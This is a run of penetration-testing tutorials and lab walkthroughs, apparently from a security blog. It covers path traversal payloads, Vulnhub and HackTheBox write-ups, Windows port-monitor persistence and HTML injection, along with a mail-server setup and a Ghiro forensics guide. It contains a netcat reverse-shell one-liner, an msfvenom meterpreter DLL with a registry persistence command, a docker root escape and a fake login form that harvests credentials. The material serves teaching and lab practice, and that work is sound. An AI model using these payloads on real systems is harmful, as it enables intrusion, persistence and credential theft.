sudo apt install apache2 php php-curl php-json php-iconv php-xml php-dom php-mysql php-pdo libapache2-mod-php



Let’s install Curl, which could help us in our future progress.

apt install curl



Now in the var/www/html folder, simply run the following command-

curl -s http://repository.rainloop.net/installer.php | sudo php



As we’ve installed the Rain Loop server, let’s not try to create some new users. From the below image you can see that I’ve created two users as:

adduser geet

adduser aarti



Now simply surf localhost/admin in your browser and set up the admin account there.


From the below image, you can see that as we surf the above URL, we’re redirected to the default Rain loop’s admin portal.



In the dashboard, select the Domains section over in the left-hand panel.



Now click on the Add Domain option provided.



Navigate to the Domains menu, hit on Add Domain, and enter your domain name settingsand do the modifications as shown in the below image.




Now, we are all set to send the email. Fire up “ifconfig” in the terminal to check the IP address.



I’ve now browsed the ubuntu’s IP and logged in inside RainLoop as “geet@mail.ignite.lab : 123”. As soon as I hit enter, I got landed into the account, where I can send any mail to any user in the domain, as of like the other mail agents.



From the below image, you can observe that the user geet is trying to send a mail to the user aarti of the same domain.



Now, as the user aarti logs in into her account to verify whether she had receivedtheemail from the user geet or not.



Great!! From the below image, you can see that the user Aarti has successfully got the mail from the user Geet.



Forensic Investigation: Ghiro for Image Analysis

0
0

In this article, we will learn how we can use the Ghiro image analysis tool in forensic investigation. Ghiro is a digital image forensic tool. Which is fully automated and opensource.

Table of content

·         What is Ghiro?

·         Features of Ghiro

·         Setup the Ghiro

·         Working on case with Ghiro


What is Ghiro?


It is developed by Alessandro Tanasi Jekil and Marco Buoncristiano Burlone. It is a fully automated tool designed to run forensic analysis over a massive amount of images, just using a user-friendly and fancy web application.

To know more about the Ghiro image analysis tool you click here.

Features of Ghiro


We can control all Ghiro features via the web interface. We can upload an image or a bunch of images to get a quick and deep overview of image analysis. We can group images in cases and search for any kind of analysis data.

The main features of Ghiro.


·         Metadata Extraction: Metadata is divided into several categories depending on the standard where they are come from, Image metadata are extracted and categorized. EX- EXIF, IPTC, XMP.


·         GPS Localization: It is Embedded in the image metadata sometimes there is a geotag, a bit of GPS data providing the longitude and latitude of where the photo was taken, it is read and the position is displayed on the map.


·         MIME Information: The image MIME type detected to know the image type we are dealing with, in both contacted and extended form.


·         ELA: ELA stands for Error Level Analysis. It identifies areas within an image that are at different compression levels. The entire picture should be at roughly the same level if a difference is detected, then it likely indicates a digital modification.


·         Thumbnail Extraction: The thumbnails and data related to them are extracted from the image metadata and stored for review.


·         Thumbnail Consistency: Sometimes when a photo is edited the original image is edited but the thumbnail not difference between the thumbnails and the images are detected.


·         SignatureEngine: They have over 120 signatures that provide evidence about the most critical data to highlight focal points and common exposures.


·         Hash Matching: Suppose we are searching for an image and we have only the hash value. We can provide a list of hashes and all images matching are reported.


Setup the Ghiro

Now we need to set up our Ghiro, we recommend the “OVA” version because it is the faster way to start using the Ghiro. After downloading the Ghiro, in few minutes you will have a fully functional Ghiro set up to start to analyze our images.


To download the Ghiro image analysis tool, click here.

After opening this OVA file in Virtual Box or VMWare, It will come up as a screen like this.

It is showing us the two details

IP address: 192.168.0.7

We can use this detail to trigger our software.

Default credentials to log in Ghiro are

Username: ghiro

Password: ghiromanager






Now we open that IP address in our browser, to move further in the setup process.





Straight away we focus on the login screen and fill up its credentials. After filling up the details click on the login button.






Now, we can see that we successfully set up the Ghiro, the dashboard in the home screen says that welcome to Ghiro, Which confirms that our setup is successful.



As we can see that it has we user which user: ghiro through which we log in the software. At initial point it shows zero cases and zeroes analysis left because we just set up this software.






Working with Ghiro

To start working with Ghiro for image analysis we need to click on cases. Where we can see that it is completely blank, then notice a [+]to add any case to this directory.






Now, we need to fill up the details regarding the forensic case like case name, case description, and its Investigating user.






After saving the details regarding this forensic case, It will confirm these details and ask us to add images to analysis. To add images click [+]button.






To will lead us to a window through which we can add images by clicking in the add fileoption. Browse the file you want to analyze. After adding those files click on the start upload button.






After uploading these files it will show us the files and their status of uploading these images. In this uploading process, Ghiro demands us to refresh this screen by clicking on the highlighted refresh button. Click on the refresh button to finishing up the upload.






We can see that the file upload process in just finished now we have two options to analyze the image. The first option is directly to click on the image name to view their details.






The second option is to click on the images tab and then click on the image we want to see their details. Both of them are kind of the same it doesn’t affect the forensic investigation process.






Click on the image we want to analyze, it will show us the basic details regarding the image in the dashboard which shows us all the analysis results like static analysis, EXIF, IPTC, XMP, Signature check, etc.






Now we clicked on the second options offer by the dashboard menu which is Signature results. Which shows us all the signature matched by severity. In case 4 are low, 3 are medium and nothing is high.






In the second tab, we see static and its first option is static info. In the static info option, we see all the basic information about the image.






We switched to the second option which is FileType. Which says it is a jpeg file standard for EXIF.






The Third option shows all the Hash values of this file within different algorithms. If we Focus hard we can see that MD5 hash values are the file name, when we clicked on the image for analysis.






The fourth option which we see is Strings. It will show us all strings behind this image file with the slight details of the metadata of this image file.






The final option offered by the static is the Hex dump. It will show us the hexadecimal value of that image file through which can get some small details about that image file.






Now switch on the third tab EXIF, which has only one option which says about EXIF the metadata. We get some of the major details for our forensic investigation.






Scroll down to get full segments of the metadata of image files that can become handy in forensic investigation. Regarding GPS, Thumbnails, and IOP.






After switching the one more we found out the thumb tab. This shows us the all details regarding the thumbnail of the image. Regarding Mime type, Extension, and Dimension.






The fifth tab of Ghiro image analysis we get ELA. Error Level Analysis (ELA) permits identifying areas within an image that are at different compression levels. With JPEG images, the entire picture should be at roughly the same level. If a section of the image is at a significantly different error level, then it likely indicates a digital modification.

If we focus hard and keep the brightness high we can see the Error image analysis of our image as well.






The final tab shows us the signature values in the image analysis. Which we already discussed above.






Overall Ghiro is the complete image analysis tool that can be quite beneficial in any Forensic Investigation.

Comprehensive Guide on Path Traversal

0
0

In our previous post, we’ve explained the Local File Inclusion attack in detail, which you can read from here. I recommend, then, to revisit our previous article for better understanding, before going deeper with the path traversal vulnerability implemented in this section.
Today, in this article we will explore one of the most critical vulnerabilities, that arises when the developer does not validate the inclusion functions in the web-applications, which thus allows the attacker to read and access any sensitive file from the server.


Table of Content

·         Introduction

·         Basic Path Traversal

·         Blocked Traversal Sequence

·         Validated Path Traversal

·         Path Disclosure in URL

·         Null Byte Bypass

·         Windows Server Path_Traversal Exploitation


Introduction

Path Traversalsometimes also termed as “Directory Traversal” is an HTTP vulnerability which allows an attacker to trick and manipulate the web application's URL in order to access the files or directories that resides outside the application’s root folder. This vulnerability carries when a developer fails to establish or manage the input validations while including the files such as images, static texts, codes, etc. in their web applications.

However, in such attacks, the attacker manipulates the web application input fields by entering the dot-dot-slash (../)sequences or some similar variations, in order to bypass the web page and access the desired system file.


Let’s check out this scenario and learn how an attacker defaces the web-application by grabbing the server’s sensitive files.


Here, the user calls up a file - index.php through the web application's URL i.e. http://abc.com/file=index.php. Thus the application process the URL and calls up the index.php that was present locally into the server folder “RAJ” as “/var/www/html/RAJ”. 


The developer uses this “include” functionality as “file=” with a simple intention to manage the user’s selected input files, such that the application can directly call it from the local server.


Now the attacker tries to manipulate the URL using the dot-dot-slash sequence as http://abc.com/file=../../../../etc/passwd, in order to retrieve the contents of the server’s password file.

Thus again the application will process it and reads up the file at /var/www/html/RAJ /../../../../etc/passwd. Every “../” represents - back to parent directory, thus if we call up “../” for four times, it will put us in the “root” directory, from there we can simply access the password file as etc/passwd.




Let’s now try to implement this in some real scenarios and check the different attacking sequences rather than the dot-dot-slash only.

For all this, I’ll be using two different platforms The Portswigger Academyand DVWA which contains the path traversal vulnerability.


Basic Path Traversal


Login into the PortSwigger academy and drop down till Directory Traversal to get into its labs, choose the first lab as “File path traversal, simple case” and hit the “Access the lab” button.

Here you’ll now be redirected to an e-commerce website, which is having several products in its a catalogue and is suffering from path traversal vulnerability.



As to further, I’ve opened a product and checked out its the display image with a simple right-click as view image.

Now its time check what we could manipulate.

Tune in you burp suite to capture the ongoing HTTP Request and share it all with the Repeater.



As in the GET request, above in the image, you can notice that the filename=67.jpg, let's try to change this filename with

filename=../../../etc/passwd

Great!! From the below image, you can see that we’ve successfully grabbed the passwd file.




Blocked Traversal Sequence

There are situations when the developers end up the traversal process i.e. the dot-dot-slash or any subsequent sequence will not work in such case.


While getting to the second lab, I got the same issue i.e. the “../” sequence didn't work and I fail to capture the password file.

So let’s try to capture this request again in our burpsuite monitor.




From the below image, you can see that I’ve grabbed up the request with filename=66.jpg, and now will shift this all to the Repeater.



As we’re blocked with the “../” sequence. Let’s try to enter /etc/passwdwithout any preceding values.


Cool!! This worked, we got the passwd file with the direct call.



Validated Path Traversal

Many developers validate their web-applications, that if the “../”comes into the URL, it gets rejected out. Thus when we tried both the above procedures in our next lab, we got rejected out and didn’t get anything.

Therefore we capture the HTTP request in our burpsuite and traverse it to the Repeater.



This time we manipulate the URL filename parameter with “double dots followed by double slashes” i.e. “….//….//….//etc/passwd”


Great!! From the above image, you can see that we’ve again captured the password file with this unusual technique.


As we jumped over the 4th lab, we got this, the developers had made a validation which blocks up the input which contains the path traversal sequence.



Therefore in order to bypass this validation, I’ve again captured the request and send it to the repeater, to make some manipulations.



From the below image, you can see that, I’ve manipulated the URL filename parameter and have successfully accessed the password file with

 filename=..%252f..%252f..%252fetc/passwd



Path Disclosure in URL

Isn’t it great if you get the number of back steps you need to perform in order to capture your desired file?

Path disclosure is that vulnerability, where the URL offers the complete path of the file it is containing, which thus allows the attacker to simply manipulate the URL and with no efforts he can access the system files.


As we moved further to lab 5, we were encountered with an application that was offering us the complete path of the file.

We simply just captured that request and send it to the repeater. From the below image, you can see that the filename parameter is having the vale as “/var/www/images/21.jpg”. Which means that the image is inside the imagesdirectory and the root directory is just 3 steps away from us.



As we are now aware of the number of back steps we need to make to get into the password file so we’ll do that as


filename-/var/www/images/../../../etc/passwd


Null Byte Bypass

Many developers add up a ‘.php’ extension into their codes at the end of the required variable before it gets included.

Therefore the webserver interprets the /etc/passwd as /etc/passwd.php, thus we could not access the file. In order to get rid of this .php we try to terminate the variable using the null byte character () that will force the php server to ignore everything after that, as soon as it is interpreted.


As soon as we share the captured request to the repeater we’ll try to eliminate this null byte character as discussed above.




So from the below image, you can see that we’ve again captured the password file by adding up () in the URL as :

filename=../../../etc/passwd.jpg


Windows Server Path_Traversal Exploitation

It’s not necessary that every time we encounter with an application which is running over a Linux server, thus there are chances that our luck didn’t work and we got stuck with a window’s server.

Let’s learn the different sequences and the method that can be used during such situations.


I’m having DVWAsetup over my window’s machine. You can learn this all from here.


Now its time to boot inside the DVWA application as “admin: password” with the security level as “low”. Further, choose the vulnerability as File Inclusion from the left-hand panel.


As soon as we choose this, we’ll be redirected to the webpage which is suffering from path_traversal vulnerability.

Let’s capture this request through burpsuite and see what we can get through it.



From the above image, you can see that file.php is included in the pageparameter. Let’s share this all to the repeater and will try to play with this field.

In order to call up the windows file on the web-applications screen, manipulate the page parameter with the following input.

page=C:/Windows/win.ini



From the above image, you can see that we’ve successfully called up the file in the repeater. Now forward this request and check the result over the application’s screen.



Whether the application is hosted over a linux server or a windows one, the developers always validate their web-applications, but yes these validations are somewhere common.

Let’s check out some validations implemented by the developer and try to bypass them.


Double dots with Forward-Backward Slashes

In order to keep the application secure with the path traversal attacks the developers blocks up to some sequences such as “../”, which thus gets rejects out automatically if entered in the URL.


Increase up the DVWA’s security level and set it to “medium”. Capture the request at burpsuite and send everything directly to the repeater.


Form the below image, you can see that we’ve successfully bypassed this validation by the dots followed by the forward-backwards slashes and have again grabbed the “win.ini” file by :


page=…./\..../\..../\..../\..../\Windows/win.ini


Using a similar sequence you can even capture other files present in the windows system. From the below image you can see that I’ve grabbed up a flag i.e. fi.php which resides in the hackable folder by simply manipulating up the URL parameter as :

page=…./\..../\hackable/flags/fi.php




There are many situations when such conditions didn’t work, that is the developer validates and block every possible sequence he can.

Let’s find out is there any other possible way to get the “win.ini” file without getting involved in the commonly used sequences.


Again go for the security option and hit it up with the high security in your DVWA application.

Come back to the File Inclusion section and capture the request in your burpsuite.



Share the HTTP request to the repeater tab and manipulate the URL page parameter with :

page=file://C:/Windows/win.ini

From the below image you can see that we have captured the “win.ini” file by entering the complete path to it in the URL parameter.



Let’s now try to capture the flag with the same procedure as :

 page=file://C:/xampp\htdocs\dvwa\hackable\flags\fi.php

Great!! We have grabbed this hackable flag too.


BlackRose: 1 Vulnhub Walkthrough

0
0
Today we are going to solve another boot2root challenge called "BlackRose: 1".  It's available at VulnHub for penetration testing, you can download this from here.

The credit goes to BadLamerfor designing this VM machine. Let's start and learn how we can break this down.


Level: Hard


Penetration Testing Methodology


Reconnaissance

·         Nmap

Enumeration

·         Steghide

Exploiting

·         ByPassing PHP strcmp()

·         Remote Command Execute (RCE) from the application web

·         Use of cryptography and cyphers (Cyberchef & others)

Privilege Escalation

·         Abuse binary ld.so

·         Cracking SSH Keys with John

·         Reversing binary with Ghidra

·         Abuse script with Filter ByPass extensions and WAF application

·         Capture the flag

Walkthrough

Reconnaissance

So, let's start this all by running up “nmap” with an “aggressive scan”, in order to capture the ports with the enabled operating system, software versions, scripts and traceroutes.

nmap -A –p- 192.168.1.21




Enumeration

As we enter the website, we were presented with an authentication system, which thus allows us to enter some credentials or to register ourselves into it.



On the other hand, we noticed a background image behind the login portal, thus we downloaded it in order to check whether it contains any specific information or not. As we track it over the steghide tool, we got something but we lacked with a key to decipher it.



Exploiting

After trying to evade the form with other techniques, we were clear that this website is vulnerable to "strcmp".

Let’s capture this request in burpsuite and check what we can have over in its response.

Request Burp:


Response Burp:




Great!! We execute the answer in our web browser and have bypassed the administration panel as "admin" user.



Now as we go further, inside this panel, we got a hash in "bcrypt" and there is a box to type the input command. But if you try to run the "ls" command, it will pop you back out with an error.
So let’s try to crack this captured hash through John The Ripper. As in the output result, you can see that we got the command as "whoami".




Let’s now try to execute the "whoami" command in the web-application.



Very well, as we are not aware of the application’s procedures, let’s then try to generate a hash in "bcrypt" with a command that will allow us to raise a reverse shell from our kali machine.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.22 1234 >/tmp/f



We’ll now set up a netcat listener at port 1234. Further, change up the field hash and rewrite the command:



Great!! We’ve successfully captured the victim's Shell.




Privilege Escalation (user “delx”)
Thus with the help of python, we’ll have our interactive shell, now it's time to get the privileges of the "delx" user.

To do this, we will execute the command "sudo -l" and check whether we can make the use of a binary called "ld.so",as easy as running:


sudo -u delx /bin/ld.so /bin.sh


From the below image, you can see that we got the shell with the user.



As we traverse the files of the user "delx",  we encounter that it is having the directory as  ".ssh", copy the "id_rsa" file and try to crack it with "ssh2john", JohnTheRipper and the rockyou dictionary.



Great!! We can now connect it via SSH!



 Privilege Escalation (user “yourname”)
Let’s surf the files that were having access to the user "delx" and during the procedure, we were encountered with a binary file called "showPassword".



 Thus the binary will be used to check a password to decipher the content that is marked in green.


We will analyze the code with Ghidra (you can even use some other), check for its decompiler and list the password inside it.



We go back to the binary, type the password and check whether it is correct or not.



Let’s try to decipher the content over some online tools. I’ve used AES encryption to do so. From the below image, you can see that we are now again having another encryptedtext to entertain.



After testing this key with all the 3 users, it didn’t work for any of them. Do you remember the background image that we’ve downloaded in the beginning?

Let’s try to do it here.



After checking every possible way, we finally decrypted it as "ROT47".


Let’s now try the password with the user "yourname" and therefore we’ve finally captured the flag of "user.txt".



 Privilege Escalation (root)
Fire up "sudo -l" and list a script which we can execute as "root".

As we tried to execute it, we got prompted with a message as “Invalid file read”



It’s clear that we do not have access to the script, but it is also understandable that it can be filtered by the extensions.
After trying to read different extensions, we find one that worked for us i.e. "PHP"!



As you can see, it passes the extension filter, but it doesn't run the content. This can be because the script might have the "WAF" function and filters some words.
After some documentation, I modified the proof of concept and I managed to bypass the "WAF".



Well, let's not waste any more time, and add up "/bin/sh" in order to capture the root’s shell to read the contents of the file "root.txt".



Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks


Contacted on LinkedInand Twitter.

Pwned-1: Vulnhub Walkthorugh

0
0

Today we are going to solve another boot2root challenge called "Pwned: 1". It's available at Vulnhub for penetration testing. This is an easy level lab.

The credit for making this lab goes to Ajs Walker. Let's get started and learn how to successfully break it down.

 Level: Easy

Since these labs are available on the Vulnhub website so we will download the lab file from here.

Penetration Testing Methodology

Recognition

§  Netdiscover

§  Nmap

Enumeration

§  Gobuster

Exploiting

  • Obtaining SSH private key backup

Privilege Escalation

§  Abuse of sysadmin script.

§  Abuse of Docker Group privileges

§  Capture the flag

Walkthrough

Recognition

As always, we identify the host's IP with the "Netdiscover" tool:

netdiscover



Now start by listing all the TCP ports with the help of Nmap.

nmap   –sV -sC -P-192.168.10.192



To work more comfortably, I'll put the IP address in /etc/hosts.



Enumeration

Now, we have entered the web service and found information about the hacker "Annlynn" in the body and commented lines of the source code.




We have used Gobusterwith a medium directory dictionary, indicating the typical extensions.




We will access the directory "/hidden_text" and will find a file named as "secret.dic", this contains a directory listing.  


After checking withGobuster, we saw that only the directory "/pwned.vuln" is available.




Exploiting (user “Ariana”)

We found an administration panel exposed, after trying the typical passwords to try to access and not succeed, we went to check the source code and found that there is condition in PHP with some credentials. The user already gave us the clue for which service to use (FTP).




We connect to theFTP service with the obtained credentials, we find an SSH private keyfor the user "Ariana" and a note.




Now we have changed the permissions to the file "id_rsa" and connect through SSH with the user "Ariana". Once inside, we can read the first flag.



Privilege Escalation (user “Selena”)

We execute the command "sudo -l", evidencing that we are able to execute a script called "messenger.sh" as the user "selena". If we check the code, we can verify that it executes the information in "$msg 2> /dev/null". Given this, we could insert a "/bin/bash" so that it raises a shell with the user we have previously indicated in the script.




We start the script...

We indicate the user "selena", type “/bin/bash”... That's right! We have obtained a shell with this user, we read the 2nd flag.


Privilege Escalation (root)

We type "id" and list that we belong to the group "Docker", then we check the docker images that we have available and execute the command that will allow us to escalate privileges with a shell as root.  

Finally, we will read the flag.

docker run -v /:/mnt --rm -it privesc chroot /mnt sh




Author: David Utónis Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks

Contacted onLinkedIn and Twitter.

Windows Persistence: Port Monitors

0
0

Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.
Mitre ID: T1547.010

Sub-technique of:  T1547

Let’s Check and try to perform this attack

Generate DLL Payload

In order to launch dll persistence attack, you need to execute following command which will generate a malicous dll payload.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f dll > raj.dll



Inject DLL Payload

Now inject malicious dll file into victim’s machine inside /system32 through your meterpreter session with admin privilege and then execute following command to make changes into register for printer driver installation.

upload /root/raj.dll

reg add "hklm\system\currentcontrolset\control\print\monitors\ignite" /v "Driver" /d "raj.dll" /t REG_SZ

As you can see in the given below image that we have successfully changed the registry key.



Maintain Access

Now, in future when the attack will launch the listener for obtaining a reverse connection. So, as soon as the victims machine get reboots the .dll file get active and the attacker will get meterpreter session due to Monitor DLLs that are loaded by spoolsv.exe for DLLs.



Reference: https://attack.mitre.org/techniques/T1547/010/

HackTheBox Sauna Walkthrough

0
0

Today we are going to solve another boot2root challenge called "Sauna".  It's available at HackTheBox for penetration testing. This is an easy level lab.
The credit for making this lab goes to egotisticalSW. Let's get started and learn how to successfully break it down.

Level: Easy


Penetration Testing Methodology

Recognition

§  Nmap

Enumeration

§  Employee web corporation

Exploiting

  • GetNPUsers.py

  • John The Ripper

  • Evil-winRM

Privilege Escalation

§  Obtaining credentials with WinPeas

§  Dumper hash NTLM with Mimikatz

§  Passthehash with Evil-winRM

§  Capture the flag


Walkthrough

Recognition

So, let's start by running map with OS detection, software versions, scripts and traceroute.

nmap   -A   10.10.10.175



Enumeration

We explore the web service that list the corporation's employees on the web page.



Exploiting (flag user)


Insert everything in a file with name "users.txt".




Since we already have a list of users and the Kerberos service is enabled, we will use the "GetNPUsers.py" tool that will allow us to capture the users' hashes.


We have been lucky! We have captured the hash of the user "fsmith", now we will use JohnTheRipper and the dictionary "rockyou" to get the password.




We connect to the machine using the "evil-winrm" tool and the credentials obtained. We read the user flag.


Privilege Escalation (root)

We download into the victim machine "WinPeas.exe" and run it, check the results and see other credentials appear.




We authenticate with these new credentials, upload "mimikatz.exe" and run it specifying the user "Administrator". At the bottom, the NTLM hash will appear.




Knowing the hash of the administrator, we can use the "-H" option of evil-winrm to connect remotely by doing a "passthehash". This way we will be administrator and we can read the root flag.



Author: David Utónis Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks

Contacted onLinkedIn and Twitter.


GreenOptic: 1 Vulnhub Walkthrough

0
0

Today we are going to solve another boot2root challenge called "GreenOptic - 1".  It's available at VulnHub for penetration testing and you can download it from here.
The credit for making this lab goes to Thomas Williams. Let's get started and learn how to successfully break it down.

Level: Hard

Penetration Testing Methodology

Recognition

§  Netdiscover

§  Nmap

Enumeration

§  Gobuster

Exploiting

  • Local File Inclusion Vulnerability (LFI)

  • John The Ripper

  • Wireshark

Privilege Escalation

§  Credential theft with network forensics

§  Abuse of Wireshark group

§  Capture the flag

Walkthrough

Recognition

We are looking for the machine IP with netdiscover


netdiscover




So, let's start by running map to all ports with OS detection, software versions, scripts and traceroute.

nmap  -A  -p-  192.168.10.160



Enumeration


We access the website and by visiting the different sections, we can list the name and surname of the CEO and other employees.




We enter the web service through port 10000 and see that it indicates a route that includes your domain name


We will configure our “/etc/hosts” file:



We open the web address websrv01.greenoptic.vm:10000 and find a control panel "Webmin". Although it seems interesting, we won't listen to it.




We used Gobuster to further investigate the first website, we found a directory called "account".




We access it and find an authentication system, but the variable "?include=cookiewarning" catches our attention.




Change "cookiewarning" to ".. /.. /.. /.. /.. /.. /.. /etc/passwd" and show that the application is vulnerable to LFI (Local File Inclusion).




Exploiting


We went through the DNS service with "dig" and listed a subdomain called "recoveryplan.greenoptic.vm". Strange, isn't it? A company that has backup!!




We introduce this subdomain to the file "/etc/hosts" and enter it from the web browser.

It asks for authentication, we try with "guessing" but without success.




This type of authentication is done through the ".htpasswd" file, taking advantage of the LFI vulnerability found above, we can load the file and read the encrypted credentials.




Using JohnTheRipper and the "rockyou" dictionary we managed to crack the hash and get the password in plain text.




We use the credentials to access the "phpBB" forum and view an administrator's post, which includes a ".zip" file containing "juicy" information.

They also mention that the "dpi.zip" file is password protected and that this has been sent to "Sam".




Again we use theLFI vulnerability and read the email from "Sam", we get the password to be able to unzip the file "dpi.zip".




We open the file "dpi.pcap" and analyzing it we find the credentials of the FTP service of the user "Alex".




We access via FTP and read the file "user.txt".

It tells us to try the same credentials to access through the SSH service, we connect through it and get access to the inside of the machine.



Privilege Escalation (root)

We check files and binaries we have access to, we check privileges and permissions and the only interesting thing is that we belong to the "wireshark" group.

We open wireshark and sniff all the traffic, we see that there is an attempt of authentication that happens frequently. We check the package in question and find some credentials in "base64".




We decode these credentials (password is: ASfojoj2eozxczzmedlmedASASDKoj3o), authenticate ourselves as "root" and read your flag.


Comprehensive Guide to HTML Injection

0
0
“HTML” is considered as the skeleton for every web-application, as it defines up the structure and the complete posture of the hosted content. So have you ever wondered, if this anatomy got ruined up with some simple scripts? Or this structure itself becomes responsible for the defacements of the web-applications? Today, in this article, we’ll learn how such misconfigured HTML codes, open the gates for the attackers to manipulate the designed webpages and grabs up the sensitive datafrom the users.


Table of Content

·         What is HTML?

·         Introduction to HTML Injection

·         Impact of HTML Injection

·         HTML Injection v/s XSS

·         Types of Injection

o   Stored HTML

o   Reflected HTML

§  Reflected GET

§  Reflected POST

§  Reflected current URL

·         Mitigation Steps


What is HTML?

HTML is an abbreviation to “HyperText Markup Langauge”, is the basic building block of the web, which determine the formation of the web pages over a web-application. HTML is used to design websites that consist the “HyperText” in order to include “text inside a text” as a hyperlink and a combination of elements that wrap up the data items to display in the browser.


So what these elements are?

“An element is everything to an HTML page i.e. it contains the opening and closing tag with the text content in between.”



HTML Tag

An HTML tag label pieces of content, such as “heading”, “paragraph”, “form”, and so on. They are the element names surrounded by angle bracketsand are of two types - the “start tag” also known as opening tag and the “end tag” referred to asthe closing one. Browsers do not display these HTML tags but utilize them to grab up the content of the webpage.


HTML Attributes

In order to provide some extra information to the elements, we use attributes, they reside inside the start tag and comes in “name/value”pairs, such that the attribute namefollows up with an “equal-to sign” and the attribute value is enclosed with the “quotation marks”.

Here the “href”is the “attribute name” and “http://hackingarticles”is the “attribute value”.


As we’re now aware of the basic HTML terminologies, let’s check out the “HTML elements flowchart”and then will further try to implement them all to create up a simple web page.


Basic HTML Page:
Every web page over the internet is somewhere or the other an HTML file. These files are nothing but are the simple plain-text files with a .htmlextension, that are saved and executed over a web browser.



Let’s execute this “hack.html” file in our browser and see what we have developed.



I guess you are now clear with “what HTML is and its major use” and “how can we implement this all”. So let’s try to find out the major loopholes and learn how the attackers inject arbitrary HTML codes into vulnerable web pages in order to modify the hosted content.


Introduction to HTML Injection

HTML Injection also termed as “virtual defacements” is one of the most simple and the most common vulnerability that arises when the web-page fails to sanitize the user-supplied input or validates the output, which thus allows the attacker to craft his payloads and injects the malicious HTML codes into the application through the vulnerable fields, such that he can modify the webpage content and even grabs up some sensitive data.



Let’s take a look over this scenario and lean how such HTML Injection attacks are executed:




Impact Of HTML Injection

When the input fields are not properly sanitized over in a webpage, thus sometimes this HTML Injection vulnerability might lead us to Cross-Site Scripting(XSS) or Server-Side Request Forgery(SSRF) attacks.Therefore this vulnerability has been reported with Severity Level as “Medium” andwith the “CVSS Score of 5.3” under :

1.       CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page.

2.       CWE-79: Improper Neutralization of Input During Web Page Generation.


HTML Injection v/s XSS

During such attacks, there are chances when we exempt to perform an HTML Injection attack and we fall up with the XSS one because HTML injection is almost similar to Cross-site Scripting. But if we look closer between the two, we’ll notice that during an XSS attack, the attacker have an opportunity to inject and execute the Javascript codes whereas in the HTMLInjection he/she is bound to use certain HTML tags in order to deface the webpage.


Let’s now dive in further with the different HTML Injection attacks and check out the unusual ways how we can deface the webpages and captures up the victim’s credentials.


Stored HTML

A “stored HTML” also termed as Persistence”because through this vulnerability the injected malicious script gets permanently store inside the web-applications server and the application server further drops it out back to the user when he visits the injected webpage. However, when the client clicks on payload which appears as an official part of the website, thus the injected HTML code will get executed by the browser.

The most common example of Stored HTML is the “comment option” in the blogs, which allow any user to enter his feedback as in the form of comments for the administrator or other users.


Let’s now try to exploit this stored HTML vulnerability and grab up some credentials.


Exploiting Stored HTML

I’ve opened the target IP in my browser and login inside BWAPP as a bee: bug, further I’ve set the “Choose Your Bug” option to HTML Injection – Stored (Blog)” and had fired up the hack button.

Now, we’ll be redirected to the web page which is suffering from an HTML Injection vulnerability which allows the user to submit his entry in the blog as shown in the screenshot.


Initially, we will generate a normal user entry through “bee” as “Hacking Articles”, in order to confirm that the input data has successfully stored up in the webserver’s database, which is thus visible in the “Entry field”.




Now, let’s try to inject our malicious payload that will create up a fake user login form over this targeted web page and thus it will forward the captured request over to our IP.

Enter the following HTML code inside the given text area in order to set up the HTML attack.  



From the below image you can see that, as I clicked over the “Submit” button, a new login form has been displayed over on the webpage. This login form is thus now into the application’s web server, which gets rendered every time whenever the victim visits this malicious login page, he’ll always have this form which looks official to him.



So let’s now enable our netcat listener at port 4444  in order to capture up the victim’s request.

nc –lvp 4444


Though its time to wait, until the victim boots this page up into his browser, and enters his credentials.



Great!! From the above image, you can see that the user “Raj” opened the webpage and tried to login inside as raj:123.

So let’s get back to our listener and check whether the credentials are captured in the response or not.

From the below image, you can see that we’ve successfully grabbed up the credentials.


Reflected HTML


The reflected HTMLalso known as Non-Persistence”is occurred when the web application responds immediately on user’s input without validating what the user entered, this can lead an attacker to inject browser executable code inside the single HTML response. It is termed “non-persistent” as the malicious script does not get stored inside the web server, thus the attacker needs to send the malicious link through phishing to trap the user.


Reflected HTML vulnerability can be easily found in website’s search engines: here the attacker writes up some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return as in response to these HTML entities.


Reflect HTML is basically of three types:

·         Reflected HTML GET

·         Reflected HTML POST

·         Reflected HTML Current URL


Before making our hands wet by exploiting the Reflected HTML labs, let us recall that - with the GET method, we request data from a specific source whereas the POST method is used to send data to a server in order to create/update a resource.


Reflected HTML GET

Here, we’ve created a webpage, which thus permits up the user to submit a “feedback” with his “name”.

So, when the user “Raj Chandel” submits his feedback as “Good”, a message prompts back as “Thanks Raj Chandel for your valuable time.” 



Thus this instant response and the “name/value” pairs in the URL shows up that, this page might be vulnerable to HTML Injection and the data has been requested over the GETmethod. 


So, let’s now try to inject some HTML codes into this “form” in order to be confirmed up with it. Type following  script at the “Name” field as


And set Feedback to “Good”

From the below image you can see that the user’s name “Raj Chandel”has been modified as the heading as in the response message.



Wonder why this all happened, let’s check out the following code snippet.


With the ease to reflect the message on the screen, the developer didn’t set up any input validation i.e. he simply “echo” the “Thanks message” by including up the input name through the “$_GET”variable.



“There are times when the developer sets up some validations into the input fields which thus refects our HTML code back onto the screen without getting rendered.”


From the below image you can see that when I tried to execute the HTML code in the name field, it drops it back as the plain-text as:



So is the vulnerability is patched up here?

Let’s check this all out by capturing its outgoing Request with our helping hand “burpsuite” and will further send the captured request directly to the “Repeater” tab.




In the “Repeater” tab, as I clicked over the “Go” button to check for the generated response, I found that my HTML entities have been HTML decoded here as:




Thus I coped the complete HTML code and pasted that all into the Decoder tab. Further from the right-hand pallet, I clicked over at “Encode as” and opted for the URLone.

As we get the encoded output, we’ll again set it over in the “Encode as” for the URL to get it as in the double URL encoded format.


Let’s now try this out, copy the complete double encoded URL and paste it over in the “name=” field within the repeater tab in the Request option.


Click on the Go button to check for its generated Response.


Great!! From the below image, you can see that we’ve successfully manipulated the Response.


